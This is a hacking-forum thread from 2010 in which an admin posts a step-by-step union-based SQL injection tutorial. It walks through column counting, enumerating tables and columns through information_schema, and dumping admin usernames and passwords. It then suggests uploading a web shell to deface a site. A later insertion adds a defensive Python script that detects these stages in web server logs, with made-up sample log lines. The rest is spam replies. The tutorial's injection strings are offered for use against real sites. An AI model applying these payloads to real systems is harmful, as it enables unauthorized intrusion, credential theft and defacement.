Net-Bashers
SQLi tutorial.

Post  C0RPS3 Fri May 21, 2010 3:50 pm

The easiest thing to do is use a vulnerability scanner such as reilukes. Once you find one with that scanner you move on: make sure it isn't a false entry and put a ' at the end; if it comes back with a syntax error, it's vuln.

2) Next you're going to find out how many columns it has; to do this you need to put this. [example] http://www.site.com/news/news.php?id=10 order by 5-- If it comes back with a syntax error, take it down one or two to see if that is the right number of columns; it should say something like "no such column". Whenever the page returns to normal, the next number up is your amount of columns.

3) Addressing the vulnerable part is simple: you're searching for a visible column. To do this you'd use union injection here, so you'd put something like this. [example] http://www.site.com/news/news.php?id=-15 union all select 1,2,3,4,5,6-- Once you execute this command, it should come up with any number between 1 and 6 on the page; that's the column we are
C0RPS3
Admin

Posts : 10
Join date : 2010-05-15

http://www.net-bashers.org or www.net-bashers.tk


Post  C0RPS3 Fri May 21, 2010 3:51 pm

injecting into.

4) Now we are going to get the tables from the visible column; say we have a visible column number 3. [example] http://www.site.com/news/news.php?id=-15 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()-- Once you execute this command you will look for something in the list like admin_login.

5) Once you find the table you're going to be going into, delete everything back to where you typed from at the end of the numbers. Now where it says (table_name) replace that with (column_name) and type the following. [example] http://www.site.com/news/news.php?id=-15 union all select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=char(x)-- Now you're going to replace the x with something. You have to convert the table you're going into into ASCII. http://getyourwebsitehere.com/jswb/text_to_ascii.html is my fave one to use. So now once you convert it, get rid of all symbols in between the numbers, and replace them with commas
C0RPS3
Admin

Posts : 10
Join date : 2010-05-15

http://www.net-bashers.org or www.net-bashers.tk


Post  C0RPS3 Fri May 21, 2010 3:52 pm

paste it into the (x) after you get rid of the x, so now you'd have:
[example] www.site.com/news/news.php?id=-15 union all select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=char(97,100,109,105,110,95,108,111,103,105,110)-- Execute this command and it should show the columns of that table. Now then, take the ones you see like username and password, and copy them; you'll need them.

6) Now it's time to finish up. Delete all the way back to where it said (column_name) and type in the following, if you copied username and password.
[example] www.site.com/news/news.php?id=-15 union all select 1,2,group_concat(username,0x3a,password),4,5,6 from admin_login-- and hit enter, it should exploit the admin username and password, there you go but raped.
If you want, it's not entirely needed, but you can go into the admin login, and upload a shell into a picture uploader; from there you can deface the entire front page.
C0RPS3
Admin

Posts : 10
Join date : 2010-05-15

http://www.net-bashers.org or www.net-bashers.tk
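
Seen from the defending side, each step in the posts above leaves a recognisable query string in the web server's access log. The following is an added example, not part of the original posts: a Python sketch that decodes request targets and reports clients that work through several of those stages. The stage names, log lines and IP addresses are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Stage names are this example's own labels; patterns mirror the thread's steps.
STAGES = [
    ("quote_probe", re.compile(r"=[^&]*'")),
    ("order_by", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("char_encoding", re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)*\s*\)")),
    ("concat_dump", re.compile(r"\bgroup_concat\s*\(")),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalise(query):
    """Decode twice (double encoding), drop /**/ comments, fold space and case."""
    for _ in range(2):
        query = unquote_plus(query)
    query = re.sub(r"/\*.*?\*/", " ", query)
    return re.sub(r"\s+", " ", query).lower()

def classify(line):
    """Return (client_ip, path, [matched stages]) for one log line, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, target = m.groups()
    parts = urlsplit(target)
    query = normalise(parts.query)
    return ip, parts.path, [name for name, rx in STAGES if rx.search(query)]

def summarise(lines, threshold=2):
    """Clients that hit at least `threshold` distinct stages, with the stages."""
    seen = defaultdict(set)
    for line in lines:
        hit = classify(line)
        if hit and hit[2]:
            seen[hit[0]].update(hit[2])
    return {ip: sorted(s) for ip, s in seen.items() if len(s) >= threshold}
# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/May/2010:15:50:01 +0000] "GET /news/news.php?id=10%27 HTTP/1.1" 200 512',
    '203.0.113.7 - - [21/May/2010:15:50:09 +0000] "GET /news/news.php?id=10%20order%20by%205-- HTTP/1.1" 200 498',
    '203.0.113.7 - - [21/May/2010:15:50:30 +0000] "GET /news/news.php?id=-15+UNION/**/ALL+SELECT+1,2,3,4,5,6-- HTTP/1.1" 200 730',
    '198.51.100.9 - - [21/May/2010:15:51:02 +0000] "GET /search.php?q=O%27Brien HTTP/1.1" 200 900',
]
if __name__ == "__main__":
    print(summarise(SAMPLE_LOG))
```

A single stage on its own, such as an apostrophe in a surname, is common in benign traffic, which is why the summary keys on several stages from one client.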


Post  brightmix Mon Sep 13, 2010 8:14 pm

I know wot Ur thinking.......................LOL

Do you?

http://www.weddingdressebay.com

brightmix

Posts : 1
Join date : 2010-09-13


Post  w33dp0t Wed Aug 21, 2013 2:39 pm

lol nice

w33dp0t

Posts : 1
Join date : 2013-08-21
